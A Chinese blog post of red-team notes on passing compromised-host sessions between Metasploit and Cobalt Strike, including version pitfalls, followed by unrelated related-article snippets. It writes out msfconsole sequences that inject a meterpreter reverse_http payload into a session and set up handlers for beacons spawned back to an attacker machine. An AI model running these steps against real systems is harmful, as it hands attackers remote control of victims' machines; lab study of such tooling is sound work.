MSF与CS之间会话传递,互相派生,版本问题踩坑

news/2024/12/2 21:40:01/

查看kali版本:

┌──(root㉿kali)-[~]
└─# msfconsole -V
Framework Version: 6.1.27-dev┌──(root㉿kali)-[~]
└─# cat /etc/os-release    
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2022.1"
VERSION_ID="2022.1"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"┌──(root㉿kali)-[~]
└─#

cobaltstrike使用版本4.5,可以msf派生给cs4.5,但是cs4.5不能派生给msf,

得换cobaltstrike4.0至4.3的版本,试过cs3.14版,不能派生给msf6.1,版本毕竟隔太远了

msf派生给cs(cs4.3和cs4.5都可以)(192.168.50.1 : 80 是cs的windows/beacon_httpreverse_http监听器):

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.1
# cs4.1 ipaddr : 192.168.50.1
set lport 80        
set DisablePayloadHandler True
set PrependMigrate True
set session 1   
run

cs4.3派生给msf,不管cs4.3的beacon是x64还是x86,派生给msf的exploit/multi/handler都是x86:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
#set autorunscript post/windows/manage/migrate name=services.exe 
# 一迁移就会话超时
set lhost 192.168.50.130
# kali ipaddr : 192.168.50.130
set lport 6666
set ExitOnSession false
set SessionExpirationTimeout 0 
set SessionCommunicationTimeout 0 
exploit -j -z

这个地方显示x86,不知道能搞成x64吗?

beacon> spawn msf
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_http (192.168.50.130:6666)
[+] host called home, sent: 807 bytes
beacon>


http://www.ppmy.cn/news/1149895.html

相关文章

SpringMVC简介

SpringMVC简介

SpringMVC概述 SpringMVC是一个基于Spring开发的MVC轻量级框架,Spring3.0后发布的组件,SpringMVC可以和Spring无缝整合,使用DispatcherServlet作为前端控制器,且内部提供了处理映射器、处理适配器、视图解析器等组件,…
阅读更多...
聊聊HttpClient的重试机制

聊聊HttpClient的重试机制

序 本文主要研究一下HttpClient的重试机制 HttpRequestRetryHandler org/apache/http/client/HttpRequestRetryHandler.java public interface HttpRequestRetryHandler {/*** Determines if a method should be retried after an IOException* occurs during execution.**…
阅读更多...
JavaWeb---Servlet

JavaWeb---Servlet

1.Srvlet概述 Servlet是运行在java服务器端的程序,用于接收和响应来着客户端基于HTTP协议的请求 如果想实现Servlet的功能,可以通过实现javax。servlet。Servlet接口或者继承它的实现类 核心方法:service()&#xf…
阅读更多...
【Method】把 arXiv论文 转换为 HTML5 网页

【Method】把 arXiv论文 转换为 HTML5 网页

文章目录 MethodReference https://ar5iv.labs.arxiv.org/ Articles from arXiv.org as responsive HTML5 web pages. 可以将来自 arXiv 的 PDF 论文渲染成 HTML5 网页版本。 Method View any arXiv article URL by changing the X to a 5. 将 arXiv 网址中的 x 换成 5 再回…
阅读更多...
python随手小练5

python随手小练5

1、求1-100的累加和&#xff08;终止条件 1-100&#xff09;&#xff08;while和for两种&#xff09; #while循环 count 0 index 0 while index < 100:count indexindex 1 print(count)#for循环 sum 0 for i in range(0,101):sum i print(sum)结果&#xff1a; 5050 2…
阅读更多...
1688拍立淘API接口分享

1688拍立淘API接口分享

拍立淘接口&#xff0c;顾名思义&#xff0c;就是通过图片搜索到相关商品列表。通过此接口&#xff0c;可以实现图片搜索爆款商品等功能。 接口地址&#xff1a;1688.item_search_img 公共参数 名称类型必须描述keyString是调用key&#xff08;必须以GET方式拼接在URL中&…
阅读更多...
车载相关名词--车载数据中心方案

车载相关名词--车载数据中心方案

车载数据中心方案 参考链接:https://zhuanlan.zhihu.com/p/600031042?utm_id=0 下面这张图是小鹏汽车嵌入式系统高级专家 唐黾 在同ARM一起的一个演讲稿中发布的,是一张未来车载数据中心单芯片方案构想图。主要针对的是智驾域和座舱域融合方案,下面对如上图的内外部组件及…
阅读更多...
野火开发板使用FlyMcu一键ISP下载时

野火开发板使用FlyMcu一键ISP下载时

1.ISP 一键下载 野火开发板使用FlyMcu一键ISP下载时&#xff0c;记得拔掉JTAG那个20针的东西&#xff0c;要不然一直芯片超时不连接。 bsp:9600&#xff0c;使用共写入2KB,进度100%,耗时16641毫秒。 bsp:115200&#xff0c;共写入2KB,进度100%,耗时2188毫秒。 bsp:115200&#…
阅读更多...
最新文章

Copyright @ 2022~2023